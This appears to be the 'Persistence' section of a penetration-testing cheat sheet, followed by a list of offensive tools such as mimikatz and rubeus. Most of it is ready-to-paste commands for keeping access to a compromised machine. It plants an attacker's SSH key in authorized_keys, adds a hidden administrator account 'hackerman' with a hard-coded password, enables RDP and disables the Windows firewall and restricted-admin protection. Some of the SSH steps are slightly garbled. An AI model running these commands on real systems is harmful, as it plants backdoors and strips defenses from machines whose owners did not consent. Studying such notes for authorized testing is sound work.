5. Persistence

Linux - SSH

On your host

cat ~/.ssh/id_rsa.pub # if you don't have one create run: ssh-key -t rsa
# copy the content of the file into **authorized_keys** on the target host

On the target host

cd ~/.ssh/
ssh-keygen -t rsa # press enter twice
cat id_rsa.pub > authorized_keys
echo 'YOUR_PUB_KEY' >> authorized_keys

Windows

Create admin user

cmd.exe /c net user hackerman Password123! /add && net localgroup "administrators" /add hackerman && net localgroup "remote desktop users" /add hackerman

net user hackerman Password123! /add && net localgroup "administrators" /add hackerman && net localgroup "remote desktop users" /add hackerman

Enable RDP

cmd.exe /c netsh firewall set opmode disable && reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

Quick Checklist

1. Enumeration

2. Initial Access

Phishing

3. Privilege Escalation - Windows

4. Post Compromise

5. Persistence

6. Pivot

Linux AD

Blast Defender

autorecon

nmap

wpscan

fuff

nikto

gobuster

netexec

powerview

msf

rubeus

powersploit

mimikatz

ligolo-ng

5. Persistence

Linux - SSH

Windows

Create admin user

Enable RDP